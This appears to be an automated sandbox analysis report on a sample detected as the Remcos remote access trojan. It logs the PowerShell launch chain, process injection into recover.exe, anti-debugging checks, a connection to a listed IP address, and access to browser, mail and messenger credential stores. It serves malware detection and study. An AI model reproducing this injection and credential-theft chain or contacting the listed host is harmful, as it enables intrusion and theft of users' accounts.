Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Co
Source: chrome.exe, 0000000C.00000003.1520101578.0000026A26444000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528229613.0000026A26444000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical ProcessorW'
Source: chrome.exe, 0000000C.00000002.1532335022.0000026A2CC72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: GAP::$DATAeHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
Source: chrome.exe, 0000000C.00000003.1490321570.0000026A2CCC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Costsage{{^
Source: powershell.exe, 00000007.00000002.1418679927.000001CD79761000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration ServiceAJ
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A299C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical ProcessorZ
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor\Microsoft\WindowsApps;+
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A299C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Hypervisor Root Partitionch
Source: chrome.exe, 0000000C.00000002.1545706197.0000781403040000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=5217eb7a-9ee5-4438-80a8-74003dea1a7a
Source: chrome.exe, 0000000C.00000003.1489520753.0000026A2CCC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: do Server: RA-Secondary 3258In - Teredo Server Total Packets: Success + Error / sec3206Teredo Client3208In - Teredo Router Advertisement3210In - Teredo Bubble3212In - Teredo Data3214In - Teredo Invalid3216Out - Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo Data User Mode3224In - Teredo Data Kernel Mode3226Out - Teredo Data User Mode3228Out - Teredo Data Kernel Mode6468Hyper-V Dynamic Memory Integration Service6470Maximum Memory, Mbytes1848Bluetooth Radio1850Classic ACL bytes written/sec1852LE ACL bytes written/sec1854SCO bytes written/sec1856Classic ACL bytes read/sec1858LE ACL bytes read/sec1860SCO bytes read/sec1862Classic ACL Connections1864LE ACL Connections1866SCO Connections1868Sideband SCO Connections1870ACL flush events/sec1872LE ACL write credits1874Classic ACL write credits1876LE Scan Duty Cycle (%) - Uncoded 1M Phy1878LE Scan Window - Uncoded 1M Phy1880LE Scan Interval - Uncoded 1M Phy1882Page Scan Duty Cycle (%)1884Page Scan Window1886Page Scan Interval1888Inquiry Scan Duty Cycle (%)1890Inquiry Scan Window1892Inquiry Scan Interval1894LE Scan Duty Cycle (%) - Coded Phy1896LE Scan Window - Coded Phy1898LE Scan Interval - Coded Phy1900Bluetooth Device1902Classic ACL bytes written/sec1904LE ACL bytes written/sec1906SCO bytes written/sec1908Classic ACL bytes read/sec1910LE ACL bytes read/sec1912SCO bytes read/sec3814ServiceModelService 4.0.0.03816Calls3818Calls Per Second3820Calls Outstanding3822Calls Failed3824Calls Failed Per Second3826Calls Faulted3828Calls Faulted Per Second3830Calls Duration3832Security Validation and Authentication Failures3834Security Validation and Authentication Failures Per Second3836Security Calls Not Authorized3838Security Calls Not Authorized Per Second3840Instances3842Instances Created Per Second3844Reliable Messaging Sessions Faulted3846Reliable Messaging Sessions Faulted Per Second3848Reliable Messaging Messages Dropped3850Reliable Messaging Messages Dropped Per Second3852Transactions Flowed3854Transactions Flowed Per Second3856Transacted Operations Committed3858Transacted Operations Committed Per Second3860Transacted Operations Aborted3862Transacted Operations Aborted Per Second3864Transacted Operations In Doubt3866Transacted Operations In Doubt Per Second3868Queued Poison Messages3870Queued Poison Messages Per Second3872Queued Messages Rejected3874Queued Messages Rejected Per Second3876Queued Messages Dropped3878Queued Messages Dropped Per Second3880Percent Of Max Concurrent Calls3882Percent Of Max Concurrent Instances3884Percent Of Max Concurrent Sessions3886CallDurationBase3888CallsPercentMaxConcurrentCallsBase3890InstancesPercentMaxConcurrentInstancesBase3892SessionsPercentMaxConcurrentSessionsBase3934ServiceModelOperation 4.0.0.03936Calls3938Calls Per Second3940Calls Outstanding3942Calls Failed3944Call Failed Per Second3946Calls Faulted3948Calls Faulted Per Second3950Calls Duration3952Security Validation and Authentication Failures3954Security Validation and Aut
Source: chrome.exe, 0000000C.00000002.1531447056.0000026A29A5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processors

Source: C:\Windows\SysWOW64\recover.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

11_2_0043B88D

Source: C:\Windows\SysWOW64\recover.exe

13_2_0040BAE3

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

11_2_0041D0CF

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_004438F4 mov eax, dword ptr fs:[00000030h]	11_2_004438F4
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_040B4AB4 mov eax, dword ptr fs:[00000030h]	11_2_040B4AB4
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_1001502C mov eax, dword ptr fs:[00000030h]	11_2_1001502C

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_00411999 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,

11_2_00411999

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00435398
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0043B88D
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00434D6E
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_00434F01 SetUnhandledExceptionFilter,	11_2_00434F01
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_040B2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_040B2639
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_040B60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_040B60E2
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_040B2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_040B2B1C
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_1000B279 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_1000B279
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_1000DD9A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_1000DD9A
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 11_2_1000AFB3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_1000AFB3

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 176.65.144.3 80

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_00418267 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,GetLastError,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,

11_2_00418267

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Memory written: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: A97008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: 31B3008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: D31008	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,OpenProcess,OpenProcessToken,CloseHandle, explorer.exe

11_2_10007360

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_004197D9 mouse_event,

11_2_004197D9

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ufrigxexiotsicyjmedmitblhoqmmy"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ehwagppqwwlwtqmnwopflynbivhvfjnzk"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pcjthi"	Jump to behavior

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2521027315.0000000000C36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2521027315.0000000000C36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerL
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2518531242.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2520899917.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2518531242.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000B.00000002.2521027315.0000000000C36000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerZ

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_00435034 cpuid

11_2_00435034

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoA,	11_2_0040F26B
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: EnumSystemLocalesW,	11_2_004520E2
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: EnumSystemLocalesW,	11_2_00452097
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: EnumSystemLocalesW,	11_2_0045217D
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_0045220A
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: EnumSystemLocalesW,	11_2_0044844E
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoW,	11_2_0045245A
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_00452583
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoW,	11_2_0045268A
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_00452757
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: GetLocaleInfoW,	11_2_00448937
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	11_2_00451E1F

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_00404961 GetLocalTime,CreateEventA,CreateThread,

11_2_00404961

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_0041BB0E GetComputerNameExW,GetUserNameW,

11_2_0041BB0E

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 11_2_004491DA _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

11_2_004491DA

Source: C:\Windows\SysWOW64\recover.exe

Code function: 13_2_004192F2 GetVersionExW,

13_2_004192F2

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.3c595d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2518531242.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1402730811.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2518531242.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1402730811.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2514871921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7564, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

11_2_0040B59B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		11_2_0040B6B5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: \key3.db		11_2_0040B6B5

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
